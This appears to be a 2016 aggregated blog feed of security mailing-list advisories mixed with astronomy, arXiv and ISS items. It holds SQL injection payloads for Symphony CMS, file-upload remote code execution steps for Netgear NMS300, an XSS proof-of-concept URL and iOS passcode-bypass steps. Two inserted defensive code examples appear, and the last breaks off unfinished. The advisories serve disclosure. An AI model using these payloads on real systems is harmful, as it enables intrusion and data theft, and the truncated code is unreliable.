Reactivate via power button and like you can see the session still runs in the loop and can be requested without any pass code Note: Normally the pass code becomes available after the power off button interaction to stand-by mode 8. Successful reproduce of the local security vulnerability! Video Demonstration: In a video we demonstrate how to bypass with a unlimited loop in the interface the pass code lock settings of the iOS v9 iPad2. The issue is not limited to the device and can be exploited with iPhone as well. The power button on top activates with the stand-by mode the pass code lock for the iOS device. In case of the loop we tricked the device into a mode were we was able to bypass the pass code. URL: https://www.youtube.com/watch?v=V-9lE1L3nq0 Solution - Fix & Patch: ======================= The loop issue needs to be patched in the main interface by the dev team. The issue can be prevented by a locate of the stack with a restriction. Security Risk: ============== The security risk of the local iOS loop that results in a pass code bypass vulnerability is estimated as high. (CVSS 6.0) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [http://ift.tt/1jnqRwA] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

Reps. Maloney, King and Senator Whitehouse introduce bills to stop anonymous money ...

Maloney, King and Senator Whitehouse introduce bills to stop anonymous money laundering operations by requiring disclosure of shell corporation ...

from Google Alert - anonymous http://ift.tt/1PC09EH
via IFTTT

Galaxy Wars: M81 versus M82


In the lower left corner, surrounded by blue spiral arms, is spiral galaxy M81. In the upper right corner, marked by red gas and dust clouds, is irregular galaxy M82. This stunning vista shows these two mammoth galaxies locked in gravitational combat, as they have been for the past billion years. The gravity from each galaxy dramatically affects the other during each hundred million-year pass. Last go-round, M82's gravity likely raised density waves rippling around M81, resulting in the richness of M81's spiral arms. But M81 left M82 with violent star forming regions and colliding gas clouds so energetic the galaxy glows in X-rays. This big battle is seen from Earth through the faint glow of an Integrated Flux Nebula, a little studied complex of diffuse gas and dust clouds in our Milky Way Galaxy. In a few billion years only one galaxy will remain. via NASA http://ift.tt/1TDhw9I

Wednesday, February 3, 2016

[FD] ArpON (ARP handler inspection) 3.0-ng release

Hello guys, we have released the next generation 3.0 version. ArpON is a host-based solution that makes the standardized ARP protocol secure in order to avoid Man In The Middle (MITM) attacks through ARP spoofing, ARP cache poisoning or ARP poison routing. For further information please visit: http://ift.tt/1sHpT5N Thank you in advance.

Source: Gmail -> IFTTT-> Blogger

[FD] A tale of openssl_seal(), PHP and Apache2handle

[FD] Apple Software Update 2.1.3 (Windows) Remote Command Execution.

[FD] CALL FOR PAPERS - FAQin Congress - Madrid

The FAQin Association is proud to announce the call for [ papers, presentations, proposals ] at FAQin congress -=] About FAQin Congress FAQin congress is a free invitation-only underground hacking event in Madrid, Spain at We Rock venue from 5th to 6th of March. No press, no cops... Just you, your peers and a bunch of free beer. Think about it. Attendance is free, attendees must pass a CTF-like challenge to get a ticket. Full details at www.faqin.org -=] We are looking for offensive focused content: - Reverse engineering [ Hardware, Software, Protocol... ] - Writing and using exploits - Bypassing protections - Attacks on cryptography - Or any kind of offensive hacking -=] Guidelines: - 45 minute slots, if you need double slot let us know. - We are open to proposals for workshops, demos, live hacks... Please send an abstract, bio and "mugshot" to cfp@faqin.org before 15th of February. Questions? Free tickets? info@faqin.org

Source: Gmail -> IFTTT-> Blogger

[FD] [CERT 777024 / CVE-2016-1524/5]: RCE and file download in Netgear NMS300

Hi,

CERT/CC has helped me disclose two vulnerabilities in NETGEAR's Pro"safe" Network Management System 300 [1]. Two classical bugs: one remote code execution via arbitrary file upload and an authenticated arbitrary file download. The full advisory can be seen in my repo at [2] and it is also pasted below. I've also released two Metasploit modules to exploit these vulnerabilities [3][4]. There is currently no fix for these - do not expose NMS300 to the Internet! I've decided to release the exploits anyway as CERT's advisory details how the vulnerability can be exploited.

Regards,
Pedro

[1] http://ift.tt/23JYAKN
[2] http://ift.tt/1P86iH8
[3] http://ift.tt/1nOa8fH
[4] http://ift.tt/1NQVQQh

>> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://ift.tt/1JewOIU)
==========================================================================
Disclosure: 04/02/2016 / Last updated: 04/02/2016

>> Background on the affected product:
"NMS300 ProSAFE® Network Management System Diagnose, control, and optimize your network devices. The NETGEAR Management System NMS300 delivers insight into network elements, including third-party devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network."

>> Summary:
Netgear's NMS300 is a network management utility that runs on Windows systems. It has two serious vulnerabilities that can be exploited by a remote attacker. The first one is an arbitrary file upload vulnerability that allows an unauthenticated attacker to execute Java code as the SYSTEM user. The second vulnerability is an arbitrary file download that allows an authenticated user to download any file from the host that is running NMS300.

A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released.

>> Technical details:
#1
Vulnerability: Remote code execution via arbitrary file upload (unauthenticated)
CVE-2016-1525
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13

There are two servlets that allow unauthenticated file uploads:
@RequestMapping({ "/fileUpload.do" }) public class FileUpload2Controller - Uses spring file upload
@RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" }) public class FileUploadController - Uses flash upload

The JSP file can be uploaded as shown below, it will be named null[name].[extension] and can be reached on http://[host]:8080/null[name].[extension]. So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user.

POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1
Content-Type: multipart/form-data; boundary

Source: Gmail -> IFTTT-> Blogger

[FD] Dell SecureWorks iOS Application - MITM SSL Certificate Vulnerability

Dell SecureWorks iOS Application - MITM SSL Certificate Vulnerability

Source: Gmail -> IFTTT-> Blogger

[FD] Sauter ModuWEB Vision SCADA vulnerabilities

Vulnerabilities

Source: Gmail -> IFTTT-> Blogger

[FD] DLink DVG-N5402SP Multiple Vulnerabilities

[FD] ASUS RT-N56U Persistent XSS


Source: Gmail -> IFTTT-> Blogger

[FD] MailPoet Newsletter 2.6.19 - Security Advisory - Reflected XSS

Information

Source: Gmail -> IFTTT-> Blogger

[FD] GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text Sensitive Info Vulnerabilities

[FD] Time-based SQL Injection in Admin panel UliCMS <= v9.8.1

============================================= MGC ALERT 2016-001 - Original release date: January 26, 2016 - Last revised: February 02, 2016 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 (CVSS Base Score) ============================================= I. VULNERABILITY

Source: Gmail -> IFTTT-> Blogger

[FD] Opendocman 1.3.4: HTML Injection

[FD] Opendocman 1.3.4: CSRF

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Opendocman 1.3.4 Fixed in: 1.3.5 Fixed Version Link: http://ift.tt/1okiDue Vendor Website: http://ift.tt/Uef2S6 Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 02/01/2016 Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description Opendocman does not have CSRF protection, which means that an attacker can perform actions for an admin, if the admin visits an attacker controlled website while logged in. 3. Proof of Concept Add new Admin User:
4. Solution To mitigate this issue please upgrade at least to version 1.3.5: http://ift.tt/1okiDue Please note that a newer version might already be available. 5. Report Timeline 11/21/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of disclosure date 12/19/2015 Vendor sends fix for CSRF for verification 01/13/2016 Confirmed CSRF fix 01/20/2016 Vendor requests more time to fix other issues in same version 01/31/2016 Vendor releases fix 02/01/2015 Disclosed to public Blog Reference: http://ift.tt/1P86kyB

Source: Gmail -> IFTTT-> Blogger

[FD] Atutor 2.2: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Atutor 2.2 Fixed in: partly in ATutor 2.2.1-RC1, complete in 2.2.1 Fixed Version Link: http://ift.tt/PfH9i9 Vendor Website: http://www.atutor.ca/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 02/01/2016 Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Atutor is a learning management system (LMS) written in PHP. In version 2.2, it is vulnerable to multiple reflected and persistent XSS attacks. The vulnerabilities can lead to the stealing of cookies, injection of keyloggers, or the bypassing of CSRF protection. If the victim is an admin, a successful exploitation can lead to code execution via the theme uploader, and if the victim is an instructor, this can lead to code execution via a file upload vulnerability in the same version of Atutor. 3. Details XSS 1: Reflected XSS - Calendar CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: The calendar_next parameter of the calendar is vulnerable to XSS. This issue has been fixed in ATutor 2.2.1-RC1. Proof of Concept: http://localhost/ATutor/mods/_standard/calendar/getlanguage.php?token=calendar_next

[FD] Equibase.com HTML Injection/Possible Reflected XSS

Vulnerability Type: HTML Injection (Possible XSS) Title: Equibase.com HTML Injection Site Description: Equibase.com is the official source for horse racing results, mobile racing data, statistics as well as all other horse racing and thoroughbred racing information. Details: The page http://ift.tt/20apF5n has a parameter called type (e.g. http://ift.tt/1o81EAa) that has a limited set of valid values. The input for this parameter is rendered unmodified in the output. This allows for reflected HTML injection and content spoofing such as: http://ift.tt/20apDug Various other HTML tags were accepted and rendered. Some limited filtering did appear to be in place for XSS mitigation, as basic XSS attacks did not work. Since this was not a sanctioned test by the site owner, extensive reflected XSS testing in this parameter was not performed, but based on observation the filtering in place did not appear to be sufficient to stop an advanced reflected XSS attack. Vulnerability Severity: Medium Vendor Interaction: Vendor notified on 1/17 with full report. No response received.

Source: Gmail -> IFTTT-> Blogger

[FD] OpenXchange | Information Disclosure

[FD] VMWare Zimbra Mailer | DKIM longterm Mail Replay vulnerability

Hi@all,

VMWare Zimbra Mailer Release 8.6.0.GA, latest patch and prior versions with DKIM implementation are vulnerable to longterm Mail Replay attacks. If the expiration header is not set, the signature never expires. This means that the e-mail, perhaps caught while performing a man-in-the-middle attack, can be replayed years after catching it. This can be combined with the spoofed reply-to header field, because the header field is not hashed by Zimbra's DKIM implementation.

Supporter of vulnerability analysis: Steffen Mauer. At this point I want to thank Steffen for his good work =)

Background: To configure DKIM with VMware Zimbra, the official documentation advises the administrator to use the Zimbra management tools. With the management tools there is no possibility to add custom headers for hashing with DKIM or to set the DKIM expiration header. (http://ift.tt/1VB2KPe)

Source: Gmail -> IFTTT-> Blogger
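The two gaps named in the Zimbra post above (no expiration on the signature, and Reply-To outside the signed header list) can be checked on any received message by reading the `x=` and `h=` tags of its DKIM-Signature header. The following is an added example, not part of the original post and not Zimbra code; the sample headers are constructed, the header policy and the 7-day lifetime limit are assumptions, and it inspects tags only without verifying the cryptographic signature.

```python
"""Audit DKIM-Signature headers for a missing x= tag and unsigned Reply-To."""
import email
import re
import time

# Headers we want covered by the signature so they cannot be changed on replay.
# "from" is required in h= by RFC 6376; the rest is an assumed local policy.
WANTED_SIGNED = ("from", "reply-to", "subject", "date", "to")
MAX_LIFETIME = 7 * 24 * 3600  # assumed policy: x= at most 7 days after t=


def parse_tag_list(value):
    """Parse an RFC 6376 tag-list ("k=v; k=v") into a dict, unfolding whitespace."""
    tags = {}
    unfolded = re.sub(r"\r?\n[ \t]+", " ", value)
    for part in unfolded.split(";"):
        if "=" not in part:
            continue
        name, _, val = part.partition("=")
        name = name.strip()
        if name in tags:
            raise ValueError(f"duplicate tag {name!r}")
        tags[name] = val.strip()
    return tags


def audit_signature(value, now=None):
    """Return a list of findings for one DKIM-Signature header value."""
    now = int(time.time()) if now is None else now
    tags = parse_tag_list(value)
    findings = []

    # h= is a colon-separated list of the header fields included in the hash.
    signed = [h.strip().lower() for h in tags.get("h", "").split(":") if h.strip()]
    for name in WANTED_SIGNED:
        if name not in signed:
            findings.append(f"unsigned-header:{name}")

    # t= is the signing time, x= the expiration, both in seconds since the epoch.
    t = int(tags["t"]) if tags.get("t", "").isdigit() else None
    if "x" not in tags:
        findings.append("no-expiration")
    elif not tags["x"].isdigit():
        findings.append("bad-expiration")
    else:
        x = int(tags["x"])
        if t is not None and x <= t:
            findings.append("expiration-before-timestamp")
        elif x < now:
            findings.append("expired")
        elif t is not None and x - t > MAX_LIFETIME:
            findings.append("lifetime-too-long")
    return findings


def audit_message(raw, now=None):
    """Audit every DKIM-Signature header of a raw RFC 5322 message."""
    msg = email.message_from_string(raw)
    results = []
    for value in msg.get_all("DKIM-Signature", []):
        domain = parse_tag_list(value).get("d", "?")
        results.append((domain, audit_signature(value, now)))
    return results


# Constructed sample: no x= tag, Reply-To not listed in h=.
SIG_WEAK = (
    "v=1; a=rsa-sha256; c=relaxed/relaxed; d=mail.example;\n"
    " s=sel1; t=1454500000; h=from:to:subject:date;\n"
    " bh=Y29uc3RydWN0ZWQ=; b=Y29uc3RydWN0ZWQ="
)
# Constructed sample: expires 3 days after signing, Reply-To is signed.
SIG_OK = (
    "v=1; a=rsa-sha256; c=relaxed/relaxed; d=mail.example;\n"
    " s=sel1; t=1454500000; x=1454759200;\n"
    " h=from:reply-to:to:subject:date;\n"
    " bh=Y29uc3RydWN0ZWQ=; b=Y29uc3RydWN0ZWQ="
)
RAW_MESSAGE = (
    "DKIM-Signature: " + SIG_WEAK + "\n"
    "From: alice@mail.example\n"
    "Reply-To: someone@other.example\n"
    "To: bob@rcpt.example\n"
    "Subject: constructed sample\n"
    "Date: Wed, 03 Feb 2016 12:00:00 +0000\n"
    "\n"
    "body\n"
)

if __name__ == "__main__":
    for domain, findings in audit_message(RAW_MESSAGE, now=1454600000):
        print(domain, findings or "ok")
```

A receiving gateway can use such findings to score or quarantine mail, and a sending administrator can run it against a test message to confirm that the signer's configuration sets `x=` and covers Reply-To.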

[FD] Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities

================================================================ Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities ================================================================ Information ================================================================ Vulnerability Type : Multiple SQL Injection Vulnerabilities Vendor Homepage: http://ift.tt/1bgFZfB Vulnerable Version:Symphony CMS 2.6.3 Fixed Version :Symphony CMS 2.6.5 Severity: High Author – Sachin Wagh (@tiger_tigerboy) Description ================================================================ The vulnerability is located in the 'fields[username]','action[save]' and 'fields[email]' of the '/symphony/system/authors/new/' page. Proof of Concept ================================================================ *1. fields[username] (POST)* Parameter: fields[username] (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-6697' OR 7462=7462#&fields[user_type]=author&fields[password]=sach in&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create Author Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-8105' OR 1 GROUP BY CONCAT(0x71767a7871,(SELECT (CASE WHEN (1004=1 004) THEN 1 ELSE 0 END)),0x716b7a6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_a rea]=3&action[save]=Create Author Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (comment) Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=sachin123' OR 
SLEEP(5)#&fields[user_type]=author&fields[password]=s achin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create Author

Source: Gmail -> IFTTT-> Blogger

[FD] ManageEngine Eventlog Analyzer v4-v10 Privilege Escalation

[FD] AST-2016-003: Remote crash vulnerability when receiving UDPTL FAX data.

[FD] AST-2016-002: File descriptor exhaustion in chan_sip

[FD] AST-2016-001: BEAST vulnerability in HTTP server

Spatial Concept Acquisition for a Mobile Robot that Integrates Self-Localization and Unsupervised Word Discovery from Spoken Sentences. (arXiv:1602.01208v1 [cs.AI])

In this paper, we propose a novel unsupervised learning method for the lexical acquisition of words related to places visited by robots, from human continuous speech signals. We address the problem of learning novel words by a robot that has no prior knowledge of these words except for a primitive acoustic model. Further, we propose a method that allows a robot to effectively use the learned words and their meanings for self-localization tasks. The proposed method is nonparametric Bayesian spatial concept acquisition method (SpCoA) that integrates the generative model for self-localization and the unsupervised word segmentation in uttered sentences via latent variables related to the spatial concept. We implemented the proposed method SpCoA on SIGVerse, which is a simulation environment, and TurtleBot2, which is a mobile robot in a real environment. Further, we conducted experiments for evaluating the performance of SpCoA. The experimental results showed that SpCoA enabled the robot to acquire the names of places from speech sentences. They also revealed that the robot could effectively utilize the acquired spatial concepts and reduce the uncertainty in self-localization.




from cs.AI updates on arXiv.org http://ift.tt/1NR5z9c
via IFTTT

Finding the different patterns in buildings data using bag of words representation with clustering. (arXiv:1602.01398v1 [cs.AI])

The understanding of the buildings operation has become a challenging task due to the large amount of data recorded in energy efficient buildings. Still, today the experts use visual tools for analyzing the data. In order to make the task realistic, a method has been proposed in this paper to automatically detect the different patterns in buildings. The K Means clustering is used to automatically identify the ON (operational) cycles of the chiller. In the next step the ON cycles are transformed to symbolic representation by using Symbolic Aggregate Approximation (SAX) method. Then the SAX symbols are converted to bag of words representation for hierarchical clustering. Moreover, the proposed technique is applied to real life data of adsorption chiller. Additionally, the results from the proposed method and dynamic time warping (DTW) approach are also discussed and compared.




from cs.AI updates on arXiv.org http://ift.tt/1NR5z9a
via IFTTT

Incremental Truncated LSTD. (arXiv:1511.08495v2 [cs.LG] UPDATED)

Balancing between computational efficiency and sample efficiency is an important goal in reinforcement learning. Temporal difference (TD) learning algorithms stochastically update the value function, with a linear time complexity in the number of features, whereas least-squares temporal difference (LSTD) algorithms are sample efficient but can be quadratic in the number of features. In this work, we develop an efficient incremental low-rank LSTD(λ) algorithm that progresses towards the goal of better balancing computation and sample efficiency. The algorithm reduces the computation and storage complexity to the number of features times the chosen rank parameter while summarizing past samples efficiently to nearly obtain the sample complexity of LSTD. We derive a simulation bound on the solution given by truncated low-rank approximation, illustrating a bias-variance trade-off dependent on the choice of rank. We demonstrate that the algorithm effectively balances computational complexity and sample efficiency for policy evaluation in a benchmark task and a high-dimensional energy allocation domain.




from cs.AI updates on arXiv.org http://ift.tt/1l14BRH
via IFTTT

ISS Daily Summary Report – 02/3/16

Russian Segment (RS) Extravehicular Activity (EVA) #42: Today, Malenchenko and Volkov successfully completed RS EVA #42. Duration of the EVA was 4 hours and 45 minutes. The crew performed the following tasks: Samples from DC-1 EV Hatch 1 external surface and SM Window #8 cover drive location in support of TEST Experiment. Thumb Drive Jettison Removal of EXPOSE-R monoblock from the Service Module Removal of СКК #2-М2 cassette-container and installation of СКК #3-М2 cassette-container onto МRМ2 Installation of БЭО #2 (Sample Exposure Unit) on MRM2 in support of the VINOSLIVOST Experiment Changing orientation of БКДО (Plume Impingement and Deposit Monitoring Unit) on МRМ2 Installation of gap spanners on FGB ПГО-3 conical section Installation of RESTAVRATSIYA Experiment onto DC1 EVA ladder Photos of ISS RS exterior Photo Survey: During the EVA ingress timeframe, Kelly and Kornienko were isolated to the MRM2 / 44S volume. While in MRM2, Kelly performed a photo survey of the Starboard Solar Array Wing Mast and the Crew and Equipment Translation Aid (CETA) Toolbox. Burning and Suppression of Solids – Milliken (BASS-M): Today Kopra completed the third set of BASS-M operations, preparing and testing five different samples with ground assistance from the Principal Investigator. The BASS-M investigation tests flame-retardant cotton fabrics to determine how well they resist burning in microgravity. Results benefit research on flame-retardant textiles that can be used on Earth and in space. Combustion Integrated Rack (CIR) Maintenance and Reconfiguration: Kelly completed the second of three planned days of Multi-user Droplet Combustion Apparatus (MDCA) maintenance in the CIR. During the multi-day reconfiguration he will replace the needles, fuel reservoirs, igniter tips and the fiber arm. The CIR reconfiguration activities performed this week are to prepare it for runs of the FLEX-2 experiment next week.
The CIR is used to perform combustion experiments in microgravity.  FLEX-2 studies the rate and manner in which fuel is burned, the conditions that are necessary for soot to form, and the way in which a mixture of fuels evaporate before burning.  The results from these experiments are expected to give scientists a better understanding of how fires behave in space and will provide information that will be useful in increasing the fuel efficiency of engines that use liquid fuels.   Japanese Experiment Module (JEM) Airlock Pressurization and Leak Check:  On Monday, Peake brought the JEM Airlock Slide Table with attached Cyclops back into the Airlock.  Today he pressurized the JEM Airlock and performed a leak check.  This Friday he will remove Cyclops from the Slide Table and stow it in the ISS.   Oxygen Generation Assembly (OGA) H2 Sensor Change Out:  On Monday, OGA experienced a fault associated with its H2 sensor.  Today, Peake performed a change out of the OGA H2 sensor.  The ground team successfully reactivated the system later in the day.   Lab Carbon Dioxide Removal Assembly (CDRA) Status:  Yesterday afternoon the Lab CDRA faulted due to Air Selector Valve (ASV) 104 not reaching its correct position.  Flight Controllers were able to recover Lab CDRA and reactivated the system.  This morning Lab CDRA faulted due to valve 105 and was recovered.  This afternoon Lab CDRA faulted yet again due to valve 104.  Flight controllers are working to recover.  Amine Swingbed is active to help manage carbon dioxide levels.  Node 3 CDRA experienced a fault with its Fan Motor Controller on January 19th and is currently deactivated, with maintenance activities scheduled to begin tomorrow.  The Russian Vozdukh was deactivated for today’s EVA, and has since been reactivated.   Air Quality Monitor (AQM) Deploy:  Kopra deployed two new AQMs within the Lab today.  Checkout of one of the AQMs was nominal, but the second showed internal sample pressure lower than design.  
Ground teams are working on troubleshooting steps. The new monitors arrived onboard Orbital ATK (OA)-4 and replace older units.

Today’s Planned Activities
All activities are on schedule unless otherwise noted.

Biochemical urine test (pre-EVA) DC1 and ПхО setup for EVA USOS window shutter close CUCU hardware deactivation c/o prior to EVA -42 On MCC Go Post-deactivation БС Elektron Purge Spacesuit systems c/o MDCA – hardware relocation (part 2) JEMAL – JEM Airlock repress Pre-EVA MRM2 setup and Soyuz 718 activation Orlan interface unit (БСС) c/o in DC1 Orlan interface unit (БСС) c/o in ПхО BASSM – prep ops 1 JEMAL – JEM Airlock leak check Columbus Stowage Consolidation Part 2/3 Pre-EVA comm config and ПСС Caution and Warning switchover On MCC Go Tranzit-B activation DC1 БК-3М c/o Spacesuit, Orlan interface unit (БСС), comm and medical parameters checkout via TLM Pre-EVA ISS onboard systems configuration (stage 1) Final inspection of spacesuits and interface units prior to spacesuit donning Gear donning Dose Tracker data entry – subject OGA Hydrogen Sensor Unstow Air ducts removal in DC1 (without [В3] fan) AQM Cartridge R&R Pre-EVA depress AQM Placement and Checkout CIR – combustion chamber closure OGA Hydrogen Sensor R&R CIR – rack doors closure HMS – defibrillator inspection Periodical fitness check – nominal ops (subject) BASSM – experiment start EVA-42 CDRA recovery procedure review СОЖ Maintenance BASSM – BASS hardware install and test runs OGA Hydrogen Sensor R&R HABIT. Overview video BASSM – BASS hardware install and test runs DOSETRK – Application Update (start) iPad Configuration for Dose Tracker Dose Tracker Data Entry – Subject BASSM – Experiment Completion JRNL – journal entry On MCC Go Pre-EVA ISS onboard systems configuration (stage 2) P/TV setup for SA truss imagery MRM2 air ducts removal / r/g 1311 P/TV – starboard SA truss inspection On MCC Go РО-ПхО, МRМ2-СУ hatch closure (SM) On MCC Go ПГО-СУ hatch closure (SМ) Post-EVA repress Soyuz 718 crew isolation in МRМ2 during EVA-42 Post-EVA repress – assistance FMK deployment ops GSC container sampling ops FCC photography hardware stow On MCC Go МRМ2-СУ hatch opening (SМ) Comm deconfiguration, C&W’s switchover from ПхО EVA support panel to C&W panel (ПСС) On MCC Go Тranzit-B deactivation ISS RS configuration to initial Post-EVA DC1 air ducts install USOS window shutter closing Biochemical urine test post EVA […]

from ISS On-Orbit Status Report http://ift.tt/1nHEpMO
via IFTTT

Mismatched anonymous define

Mismatched anonymous define () (1 post). kik7. Member Posted 24 minutes ago #. Hi everyone! Please help me solve this problem. I can't get data ...

from Google Alert - anonymous http://ift.tt/1o6MXwY
via IFTTT

Latest Windows 10 May Have a Linux Subsystem Hidden Inside

A few months back, Microsoft impressed the world with its 'Microsoft loves Linux' announcements, including that it had developed a custom Linux-based OS for running Azure Cloud Switch and had selected Ubuntu as the operating system for its Cloud-based Big Data services.

Now a renowned Windows hacker and computer expert, who goes by the name ‘WalkingCat’, has discovered that the latest version of Windows 10 may have a Linux subsystem secretly installed in it.

According to his tweets, the hacker spotted two mysterious files, LXss.sys and LXCore.sys, in the latest Windows 10 Redstone Build 14251, which are suspected to be part of Microsoft’s Project Astoria.

Project Astoria, also known as Windows Bridge for Android, is a toolkit that allows running Android apps on Windows 10 Mobile devices.

The naming convention of the newly discovered files is very similar to that of the Android Subsystem files from Project Astoria, i.e. ADss.sys.

The "LX" in these names can only stand for one thing, and that is LINUX, which suggests that the Windows 10 OS will also have access to a Linux subsystem.

Why Linux Subsystem?

Since Windows 10 has been introduced as a universal operating system for all devices, it is possible that Microsoft wants to expand Project Astoria from Windows Mobile to desktop users.

If this turns out to be true, adding a Linux subsystem could be beneficial if Microsoft also has ambitious plans to offer support for Linux-based applications on the Windows operating system, especially server-related technology and software.

Stay tuned to The Hacker News Facebook page for further developments on this topic. Isn't it exciting?


from The Hacker News http://ift.tt/20qpBDO
via IFTTT

Better fields not recorded when 'Cache pages for anonymous users'

When you enable 'Cache pages for anonymous users' the Node ID (and other better statistics data) is not passed through, not recorded, neither to ...

from Google Alert - anonymous http://ift.tt/1S0uDSK
via IFTTT

[FD] Security Advisories

[FD] Compal ConnectBox Wireless - Passphrase Settings Filter Bypass Vulnerability

Document Title:
===============
Compal ConnectBox Wireless - Passphrase Settings Filter Bypass Vulnerability

References (Source):
====================
http://ift.tt/1R1AN3U

Release Date:
=============
2016-02-03

Vulnerability Laboratory ID (VL-ID):
====================================
1705

Common Vulnerability Scoring System:
====================================
5.8

Product & Service Introduction:
===============================
Wireless modem CBN CH7465LG is the world's most compact voice modem. EuroDOCSIS 3.0 in the stylish and elegant design suitable for home, home office or smaller businesses. It can be used in households with one or more computers with support. Wireless remote access to a wireless modem.

(Copy of the Homepage: http://ift.tt/1X2Zqxz )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a filter bypass web vulnerability in the official Compal Wireless ConnectBox web-application.

Vulnerability Disclosure Timeline:
==================================
2016-02-03: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Compal
Product: ConnectBox - (Wireless) 4.01 - H7465LG-NCIP-4.50.18.15-1-NOSH

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A filter bypass web vulnerability has been discovered in the official Compal Wireless ConnectBox web-application. The filter bypass web vulnerability allows an attacker to evade the controls of a restriction or protection mechanism. The issue allows an attacker to change the wireless passphrase to an insecure passphrase which is forbidden by the application's JavaScript engine.

The vulnerability affects the `ConnectBox` manufactured by Compal for the local small ISP Unitymedia, which offers high-speed internet access over cable (TV).

To bypass the filter you only need to replay the POST which changes the wireless passphrase and change the parameters `wlPSkey2g` and `wlPSkey5g`. The filter won't allow you to set a passphrase without special chars or uppercase/lowercase letters. By bypassing the filter you can set any passphrase (WPA needs at least 8 chars).

The security risk of the filter bypass vulnerability is estimated as medium and the cvss (common vulnerability scoring system) count is 5.8. Exploitation of the filter bypass vulnerability requires a privileged web-application user account with privileged access and medium user interaction. Successful exploitation of the vulnerability results in unauthorized access by setting a low secured passphrase key for WPA and WPA2.

Model: CH7465LG-LC
Hardware Version 4.01
Software Version CH7465LG-NCIP-4.50.18.15-1-NOSH

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers in the local network with privileged web-application user account or privileged access and medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information or steps below to continue.
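
The policy the advisory describes is enforced only by JavaScript in the browser, so the control has to be repeated where the POST is processed. The sketch below is an added example, not code from the advisory or from the vendor: the parameter names `wlPSkey2g` and `wlPSkey5g` come from the advisory, while the function names, the form-encoded body format and the sample bodies are assumptions.

```javascript
// Added example: server-side enforcement of the passphrase policy that the
// advisory says is checked only in the browser. Function names and the
// form-encoded body format are assumptions; the field names are the advisory's.
const PSK_FIELDS = ["wlPSkey2g", "wlPSkey5g"];

// Policy as described in the advisory (upper- and lowercase letters plus a
// special character), combined with WPA's own limit of 8..63 printable ASCII.
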